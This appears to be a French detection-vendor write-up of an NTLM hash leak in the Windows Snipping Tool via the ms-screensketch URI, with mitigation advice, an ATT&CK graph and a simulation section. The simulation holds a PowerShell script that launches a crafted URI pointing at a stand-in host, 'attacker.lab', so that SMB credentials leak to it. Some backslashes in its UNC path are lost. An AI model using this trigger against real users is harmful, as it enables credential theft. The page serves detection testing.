Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une vulnérabilité dans l’outil de capture Windows peut exposer les hachages Net-NTLM de l’utilisateur actuellement connecté à un attaquant distant. Le problème est déclenché par un lien profond malveillant qui abuse du ms-screensketch schéma URI, provoquant l’ouverture par l’outil de capture d’un fichier hébergé sur un partage SMB contrôlé par l’attaquant. Bien que la victime doive cliquer ou ouvrir le lien conçu, la fuite d’identifiants elle-même se produit silencieusement en arrière-plan lorsque Windows initie la connexion SMB. Ce comportement peut donner aux attaquants accès aux données de challenge-réponse NTLM sans aucun avertissement visible pour l’utilisateur.
Enquête
Les chercheurs ont découvert que le ms-screensketch protocole accepte un filePath paramètre et ne restreint pas correctement les chemins UNC arbitraires. Lorsque l’outil de capture tente d’accéder à un tel chemin, Windows essaie automatiquement de s’authentifier au serveur SMB distant, exposant ainsi la réponse NTLM au passage. Pour valider le problème, les chercheurs ont construit des scripts de preuve de concept qui lançaient un écouteur SMB et généraient un URI malveillant capable de capturer le hachage divulgué.
Atténuation
Microsoft a publié une mise à jour de sécurité le 14 avril 2026 pour résoudre le problème en supprimant le comportement de lien profond vulnérable de l’outil de capture. L’application de ce correctif empêche l’application d’ouvrir automatiquement les chemins SMB fournis par l’attaquant via des URI non fiables. Les organisations devraient prioriser le déploiement de la mise à jour sur les systèmes Windows affectés pour éliminer l’exposition.
Réponse
Les défenseurs devraient surveiller les tentatives d’invocation du ms-screensketch schéma URI et surveiller les connexions SMB sortantes vers des hôtes internes ou externes inhabituels. Les systèmes qui n’ont pas besoin de l’outil de capture devraient voir le protocole restreint lorsque possible, et le déploiement des correctifs devrait être appliqué sans délai. Tout hachage NTLM exposé devrait être immédiatement enquêté pour détecter des signes de relecture, de relais ou d’autres abus consécutifs.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[« <b>Action</b> – <b>T1204.001 Exécution utilisateur : lien malveillant</b><br/>L’utilisateur clique sur un lien malveillant qui déclenche l’exécution. »] class action_user_click action tool_snipping[« <b>Outil</b> – <b>Nom</b> : Snipping Tool (URI ms-screensketch)<br/><b>Technique</b> : T1204 Exécution utilisateur<br/><b>Description</b> : Lancé via le gestionnaire URI ms-screensketch. »] class tool_snipping tool tech_smb_conn[« <b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool traite un filePath et initie une connexion SMB vers un serveur contrôlé par l’attaquant, permettant la capture de hash. »] class tech_smb_conn technique tech_hash_capture[« <b>Technique</b> – <b>Accès aux identifiants</b><br/>L’attaquant capture le hash Net-NTLM à partir de l’échange d’authentification SMB. »] class tech_hash_capture technique tech_lateral[« <b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Le hash capturé peut être réutilisé pour le mouvement latéral ou l’escalade de privilèges. »] class tech_lateral technique tech_c2_web[« <b>Technique</b> – <b>T1071.001 Protocole de couche application : protocoles web</b><br/>L’attaquant peut utiliser des protocoles HTTP/S pour la communication de commande et contrôle. »] class tech_c2_web technique tech_persistence[« <b>Technique</b> – <b>T1574.006 Détournement du flux d’exécution : détournement du linker dynamique</b><br/>Persistance potentielle via le détournement du linker dynamique du processus Snipping Tool. »] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Flux di Attaque
Exécution de la simulation
Prérequis : le contrôle préalable de la télémétrie et de la base de référence doit être réussi.
Raison : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT directement refléter les TTP identifiées et viser à générer exactement la télémétrie attendue par la logique de détection.
-
Narratif d’attaque et commandes :
Un attaquant a obtenu un accès initial sur la station de travail de la victime et souhaite collecter les hachages NTLM sans éveiller les soupçons. Profitant de CVE‑2026‑33829, l’attaquant crée un
URI malveillant ms‑screensketch:qui pointe vers un partage SMB contrôlé par l’attaquant (attacker.labsharepayload.png). Lorsque l’outil de capture traite cet URI, Windows initie automatiquement une connexion SMB au serveur distant, fuyant la réponse NTLM de la machine. L’attaquant exécute l’URI via PowerShell pour s’assurer que l’outil de capture est invoqué dans le contexte de l’utilisateur. -
Script de test de régression :
# Fuite NTLM via l'outil de capture – déclencher le script # Ajustez le chemin UNC pour pointer vers votre écouteur contrôlé. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Invocation de l'outil de capture avec l'URI malveillant..." Start-Process $uri # Attendre quelques secondes pour que l'activation SMB se termine Start-Sleep -Seconds 5 Write-Host "Invocation terminée. Vérifiez le SIEM pour l'EventID 3 avec DestinationHostname contenant '$attackerServer'." -
Commandes de nettoyage :
# Supprimer tous les processus résiduels de l'outil de capture (s'ils sont encore en cours d'exécution) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Optionnel : supprimer les fichiers temporaires créés sur le côté attaquant (le cas échéant) # (Suppose que vous avez un accès en écriture au partage) # Remove-Item -Path "$attackerServer$sharePath" -Force